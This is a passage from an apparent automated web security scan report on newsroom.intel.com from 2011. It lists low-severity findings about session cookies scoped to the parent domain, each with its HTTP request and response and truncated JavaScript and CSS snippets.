JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=E669082769D079AB1B6BB7D5060E305B.node6IPR; Domain=.intel.com; Path=/
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=16105 t=1296956932351295
X-JSL: D=16111 t=1296956932351295
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 80219

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

11.7. http://newsroom.intel.com/4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js

Issue detail

The following cookie, shown in the response below, was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=033E5A52A6AE27B548A5D9EF6D8E5C5E.node6IPR; Domain=.intel.com; Path=/
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=12373 t=1296956932379103
X-JSL: D=12379 t=1296956932379103
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 49485

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

11.8. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=E514EB9C000C502ED588D726B4DEE54A.node6IPR; Domain=.intel.com; Path=/
X-JAL: 2
Vary: Accept-Encoding
CacheHit: D=26463 t=1296956899733157
X-JSL: D=26470 t=1296956899733157
Content-Type: text/javascript;charset=UTF-8
Connection: close

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...

11.9. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:37 GMT
Server: Apache
Set-Cookie: JSESSIONID=EE4D59A501972634AF56AA68D8967AE2.node6IPR; Domain=.intel.com; Path=/
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=131861 t=1296956917538280
X-JSL: D=131867 t=1296956917538280
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 20313

(function(c){var a=c.scrollTo=function(f,e,d){c(window).scrollTo(f,e,d)};a.defaults={axis:"xy",duration:parseFloat(c.fn.jquery)>=1.3?0:1};a.window=function(d){return c(window).scrollable()};c.fn.scrol
...[SNIP]...

11.10. http://newsroom.intel.com/4.0.6/styles/jive-community.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-community.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-community.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=5C2FF08678A49B81193C49BCB33E4E29.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=133137 t=1296956878891570
X-JSL: D=133142 t=1296956878891570
Content-Type: text/css
Connection: keep-alive
Content-Length: 20341

/*
jive-community.css - styles for the community landing page.
*/


.jive-blog-post-message h3 {
   clear: both;
float: none;
}

/* container for use on the community pages */
#jive-b
...[SNIP]...

11.11. http://newsroom.intel.com/4.0.6/styles/jive-global.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-global.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-global.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=58D180D97AB319652D509966F32227A7.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=143063 t=1296956848658188
X-JSL: D=143069 t=1296956848658188
Content-Type: text/css
Connection: keep-alive
Content-Length: 208122

/* RESET STYLES (see http://meyerweb.com/eric/tools/css/reset/) */
/*
*
* this is not a straight copy/paste from the above URL. this has been
* custom modified by us. so don't go copy/paste u
...[SNIP]...

11.12. http://newsroom.intel.com/4.0.6/styles/jive-icons.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-icons.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-icons.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=8C181A1B01DBE3858DD2ECB1E90CB81F.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=132982 t=1296956849476958
X-JSL: D=132987 t=1296956849476958
Content-Type: text/css
Connection: keep-alive
Content-Length: 25134

/* Things that might be sprited */
.jive-icon-plus,
.jive-icon-minus {
   /* edit widget layouts, leave before standard sprites */
   background-repeat: no-repeat;
   background-position: 0;
   padding: 2px
...[SNIP]...

11.13. http://newsroom.intel.com/4.0.6/styles/jive-sidebar.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-sidebar.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-sidebar.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:44 GMT
Server: Apache
Set-Cookie: JSESSIONID=351863A282E6B8E427C3AA53A775A16B.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=128681 t=1296956864616423
X-JSL: D=128686 t=1296956864616423
Content-Type: text/css
Connection: keep-alive
Content-Length: 28548

/*
jive-sidebar.css
*/
.jive-sidebar {
border: 1px solid #e5e5e5;
font-size: 1em;
margin: 0 0 25px;
overflow: hidden;
padding: 0;
position: relative; /* req for IEs */
-moz
...[SNIP]...

11.14. http://newsroom.intel.com/4.0.6/styles/jive-videomodule.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-videomodule.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-videomodule.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=C7BC34108896684F5F49C2D9A038A463.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=128999 t=1296956879588525
X-JSL: D=129004 t=1296956879588525
Content-Type: text/css
Connection: keep-alive
Content-Length: 32219

/* videomodule.css */
/* this stylesheet contains browser-specific styles for IE6 (* html) and IE7 (*+html) */

/* Styles for creating and editing a video post */
.jive-video {
clear: both;
bo
...[SNIP]...

11.15. http://newsroom.intel.com/4.0.6/styles/jive-widgets.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-widgets.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-widgets.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; 